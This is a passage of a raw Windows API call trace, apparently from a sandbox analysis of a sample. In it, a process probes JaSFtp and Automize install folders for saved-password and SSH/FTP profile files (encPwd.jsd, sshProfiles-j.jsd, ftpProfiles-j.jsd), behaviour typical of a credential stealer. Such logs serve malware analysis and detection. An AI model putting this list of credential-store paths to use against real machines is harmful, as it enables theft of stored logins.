param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0146.728] GetProcessHeap () returned 0x690000 [0146.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6a8db8 [0146.728] GetProcessHeap () returned 0x690000 [0146.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.729] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.730] GetProcessHeap () returned 0x690000 [0146.730] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.730] GetProcessHeap () returned 0x690000 [0146.730] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.731] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.732] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 42 [0146.732] GetProcessHeap () returned 0x690000 [0146.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0146.732] GetProcessHeap () returned 0x690000 [0146.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.733] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 0 [0146.733] GetProcessHeap () returned 0x690000 [0146.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.734] GetProcessHeap () returned 0x690000 [0146.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.744] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.745] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 63 [0146.745] GetProcessHeap () returned 0x690000 [0146.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.745] GetProcessHeap () returned 0x690000 [0146.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.747] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.747] GetProcessHeap () returned 0x690000 [0146.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.748] GetProcessHeap () returned 0x690000 [0146.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.749] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.751] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0146.751] GetProcessHeap () returned 0x690000 [0146.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.751] GetProcessHeap () returned 0x690000 [0146.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.753] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.753] GetProcessHeap () returned 0x690000 [0146.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.754] GetProcessHeap () returned 0x690000 [0146.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.754] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.755] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 42 [0146.755] GetProcessHeap () returned 0x690000 [0146.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0146.755] GetProcessHeap () returned 0x690000 [0146.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.758] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 0 [0146.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.759] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.760] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 63 [0146.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.762] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.762] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.763] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.764] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0146.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.765] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.766] GetProcessHeap () returned 0x690000 [0146.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.766] GetProcessHeap () returned 0x690000 [0146.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.767] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.768] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 42 [0146.768] GetProcessHeap () returned 0x690000 [0146.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0146.768] GetProcessHeap () returned 0x690000 [0146.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.769] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 0 [0146.769] GetProcessHeap () returned 0x690000 [0146.769] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.770] GetProcessHeap () returned 0x690000 [0146.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.770] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.771] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 63 [0146.771] GetProcessHeap () returned 0x690000 [0146.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.771] GetProcessHeap () returned 0x690000 [0146.772] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.773] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.773] GetProcessHeap () returned 0x690000 [0146.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.774] GetProcessHeap () returned 0x690000 [0146.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.775] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.775] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0146.776] GetProcessHeap () returned 0x690000 [0146.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.776] GetProcessHeap () returned 0x690000 [0146.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.777] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.777] GetProcessHeap () returned 0x690000 [0146.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.778] GetProcessHeap () returned 0x690000 [0146.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.779] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.779] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 42 [0146.779] GetProcessHeap () returned 0x690000 [0146.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0146.779] GetProcessHeap () returned 0x690000 [0146.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.781] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 0 [0146.781] GetProcessHeap () returned 0x690000 [0146.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.814] GetProcessHeap () returned 0x690000 [0146.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.814] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.816] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 63 [0146.816] GetProcessHeap () returned 0x690000 [0146.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.816] GetProcessHeap () returned 0x690000 [0146.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.817] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.817] GetProcessHeap () returned 0x690000 [0146.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.818] GetProcessHeap () returned 0x690000 [0146.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.818] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.819] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0146.819] GetProcessHeap () returned 0x690000 [0146.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.819] GetProcessHeap () returned 0x690000 [0146.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.821] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.821] GetProcessHeap () returned 0x690000 [0146.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.821] GetProcessHeap () returned 0x690000 [0146.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.822] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.823] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 42 [0146.823] GetProcessHeap () returned 0x690000 [0146.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0146.823] GetProcessHeap () returned 0x690000 [0146.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.825] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 0 [0146.825] GetProcessHeap () returned 0x690000 [0146.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.825] GetProcessHeap () returned 0x690000 [0146.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.826] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.827] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 63 [0146.827] GetProcessHeap () returned 0x690000 [0146.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.827] GetProcessHeap () returned 0x690000 [0146.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.829] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.829] GetProcessHeap () returned 0x690000 [0146.829] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.830] GetProcessHeap () returned 0x690000 [0146.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.831] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.832] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0146.832] GetProcessHeap () returned 0x690000 [0146.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.832] GetProcessHeap () returned 0x690000 [0146.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.834] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.834] GetProcessHeap () returned 0x690000 [0146.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.835] GetProcessHeap () returned 0x690000 [0146.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.836] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.836] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 43 [0146.837] GetProcessHeap () returned 0x690000 [0146.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5a) returned 0x6a8db8 [0146.837] GetProcessHeap () returned 0x690000 [0146.837] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.838] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 0 [0146.838] GetProcessHeap () returned 0x690000 [0146.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.838] GetProcessHeap () returned 0x690000 [0146.839] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.839] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.840] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 64 [0146.840] GetProcessHeap () returned 0x690000 [0146.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.840] GetProcessHeap () returned 0x690000 [0146.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.841] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.841] GetProcessHeap () returned 0x690000 [0146.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.842] GetProcessHeap () returned 0x690000 [0146.842] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.842] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.843] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0146.843] GetProcessHeap () returned 0x690000 [0146.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.843] GetProcessHeap () returned 0x690000 [0146.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.845] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.845] GetProcessHeap () returned 0x690000 [0146.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.846] GetProcessHeap () returned 0x690000 [0146.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.847] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.848] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 43 [0146.848] GetProcessHeap () returned 0x690000 [0146.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5a) returned 0x6a8db8 [0146.848] GetProcessHeap () returned 0x690000 [0146.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.849] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 0 [0146.853] GetProcessHeap () returned 0x690000 [0146.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.854] GetProcessHeap () returned 0x690000 [0146.854] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.855] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.856] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 64 [0146.856] GetProcessHeap () returned 0x690000 [0146.856] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.856] GetProcessHeap () returned 0x690000 [0146.857] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.858] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.858] GetProcessHeap () returned 0x690000 [0146.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.859] GetProcessHeap () returned 0x690000 [0146.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.860] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.861] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0146.861] GetProcessHeap () returned 0x690000 [0146.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.861] GetProcessHeap () returned 0x690000 [0146.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.863] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.863] GetProcessHeap () returned 0x690000 [0146.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.864] GetProcessHeap () returned 0x690000 [0146.864] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.865] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.866] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 43 [0146.866] GetProcessHeap () returned 0x690000 [0146.866] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5a) returned 0x6a8db8 [0146.866] GetProcessHeap () returned 0x690000 [0146.866] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.868] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 0 [0146.868] GetProcessHeap () returned 0x690000 [0146.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.868] GetProcessHeap () returned 0x690000 [0146.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.869] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.870] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 64 [0146.870] GetProcessHeap () returned 0x690000 [0146.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.870] GetProcessHeap () returned 0x690000 [0146.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.872] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.872] GetProcessHeap () returned 0x690000 [0146.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.872] GetProcessHeap () returned 0x690000 [0146.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.873] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.874] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0146.874] GetProcessHeap () returned 0x690000 [0146.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.875] GetProcessHeap () returned 0x690000 [0146.875] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.876] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.876] GetProcessHeap () returned 0x690000 [0146.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.877] GetProcessHeap () returned 0x690000 [0146.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.878] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.879] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 44 [0146.879] GetProcessHeap () returned 0x690000 [0146.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6a8db8 [0146.879] GetProcessHeap () returned 0x690000 [0146.879] HeapFree (in: 